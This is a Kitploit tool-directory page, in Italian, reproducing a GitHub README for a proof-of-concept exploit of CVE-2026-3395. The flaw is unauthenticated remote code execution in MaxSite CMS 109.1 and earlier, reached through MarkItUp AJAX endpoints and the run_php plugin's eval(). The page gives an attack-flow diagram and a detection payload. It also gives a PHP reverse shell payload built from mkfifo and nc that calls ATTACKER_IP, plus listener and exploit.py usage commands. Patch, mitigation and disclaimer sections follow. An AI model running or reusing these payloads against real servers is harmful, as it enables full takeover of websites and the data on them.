Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE — Proof-of-concept exploit per l'esecuzione remota di codice non autenticata in MaxSite CMS <= 109.1 tramite gli endpoint AJAX dell'editor MarkItUp, con payload di rilevamento e reverse shell. | Kitploit
Strumenti/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

Proof-of-concept exploit per l'esecuzione remota di codice non autenticata in MaxSite CMS <= 109.1 tramite gli endpoint AJAX dell'editor MarkItUp, con payload di rilevamento e reverse shell.

Vedi Repository
55 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE‑2026‑3395 — MaxSite CMS Esecuzione Remota di Codice Non Autenticata

Author Country Instagram GitHub CVE Exploit Type CVSS

Panoramica

Vulnerabilità di Esecuzione Remota di Codice (RCE) Non Autenticata in MaxSite CMS ≤ 109.1.

Il difetto deriva da controlli di autorizzazione deboli negli endpoint AJAX del plugin dell'editor MarkItUp, combinati con l'esecuzione non sicura di codice PHP fornito dall'utente da parte del plugin run_php.

  • Scoperta / Corretta: Marzo 2026
  • Corretta in: MaxSite CMS 109.2
  • Vendor: MaxSite CMS
  • Repository: maxsite/cms

Descrizione

La vulnerabilità interessa i seguenti file nel plugin dell'editor MarkItUp:

  • preview-ajax.php
  • autosave-post-ajax.php

Questi endpoint:

  • Sono accessibili senza autenticazione
  • Eseguono solo una debole validazione del referrer (facilmente aggirabile)
  • Passano l'input dell'utente al plugin run_php
  • Eseguono gli shortcode [php]...[/php] usando eval()

Un attaccante può inviare una richiesta POST appositamente costruita alla rotta /ajax/ contenente un percorso interno codificato in Base64 e un payload PHP dannoso tramite il parametro data, con il seguente risultato:

🚨 Esecuzione Remota di Codice Completa Non Autenticata


Diagramma del Flusso di Attacco

root@kitploit:~
graph TD
    A["Attaccante"] -->|"Richiesta POST dannosa"| B["Endpoint AJAX"]
    B -->|"Spoofing del Referer"| C["preview-ajax.php"]
    C -->|"Input non sanificato"| D["Plugin run_php"]
    D -->|"Esecuzione eval()"| E["Esecuzione PHP Arbitraria"]
    E -->|"Esecuzione di comandi"| F["Server Compromesso"]

Prerequisiti

  • Versione di MaxSite CMS ≤ 109.1
  • Plugin run_php abilitato (default comune)
  • Configurazione PHP che consente eval()

Sfruttamento

È incluso un proof‑of‑concept in Python 3 (exploit.py).

Payload di Rilevamento (Non Distruttivo)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

Payload di Reverse Shell

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

Utilizzo

1. Avvia il Listener

root@kitploit:~
nc -lvnp 9001

2. Esegui l'Exploit

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

Mitigazione

Azioni Immediate

  • Aggiorna a MaxSite CMS 109.2 o successivo
  • Disabilita il plugin run_php se non necessario

Patch Manuale

Aggiungi controlli di autenticazione ai file vulnerabili:

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

Riferimenti

  • Commit della Patch https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • Voce della Vulnerabilità https://vuldb.com/?id.348281

  • Record NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3395


Avviso Legale

Questo progetto è fornito per:

  • Ricerca sulla sicurezza
  • Scopi educativi
  • Test di penetrazione autorizzati

⚠️ Non utilizzare contro sistemi senza esplicita autorizzazione.

L'autore non si assume alcuna responsabilità per usi impropri o danni.


Autore

Mohammed Idrees Banyamer Giordania 🇯🇴 Ricercatore di Sicurezza

banyamer_security — Silent Hunter • Shadow Presence

Marzo 2026

Scarica lo strumento